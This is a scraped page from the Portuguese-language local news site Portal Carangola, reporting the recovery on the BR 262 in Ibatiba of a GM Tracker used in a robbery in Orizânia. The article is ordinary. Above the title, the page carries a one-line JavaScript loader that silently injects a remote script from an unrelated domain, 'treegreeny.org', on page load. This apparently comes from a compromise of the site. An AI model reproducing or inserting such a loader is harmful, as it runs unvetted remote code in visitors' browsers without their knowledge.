;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veículo usado em roubo em Orizânia é recuperado em operação policial na BR 262 em Ibatiba - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Veículo usado em roubo em Orizânia é recuperado em operação policial na BR 262 em Ibatiba

IBATIBA (ES) – Na noite de ontem (08/03), equipes da Força Tática e Agência de Área do 14º BPM foram informadas sobre a presença de indivíduos suspeitos armados que estariam aguardando um caminhão com carga de cigarros da Souza Cruz para realizar um assalto.

Durante patrulhamento pela BR 262, na altura do Motel Skala, os militares avistaram um veículo GM Tracker de cor cinza parado e dois indivíduos em uma moto Honda NXR Bros de cor preta dando cobertura ao possível assalto. Ao dar voz de abordagem, os suspeitos empreenderam fuga, sendo o veículo acompanhado pela guarnição, que o perdeu de vista antes do trevo de Lajinha/MG.

Posteriormente, foi realizado cerco na área e solicitado apoio do NOTAER (helicóptero), deslocando juntamente com a equipe do BAC (Batalhão de Ação com Cães), com cão de captura. Durante o cerco foi localizado em uma área de mata nativa densa abandonado o veículo GM Tracker. Após buscas realizadas pela área, foi encontrado um banco traseiro novo de um gol cinza próximo ao local, veículo possivelmente utilizado para transportar a carga roubada.

Na manhã desta quinta (09), o veículo GM Tracker foi reconhecido como utilizado no roubo de um caminhão de doces na cidade de Orizânia/MG. Durante buscas no veículo, foram encontrados os doces roubados do caminhão.

O veículo foi removido para o pátio do DETRAN e os produtos do roubo da ocorrência de Orizânia/MG foram apreendidos e serão entregues na Delegacia de Ibatiba/ES. Até o momento, nenhum suspeito foi capturado pelas autoridades policiais.

Carlos Henrique Cruz – Portal Caparaó

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.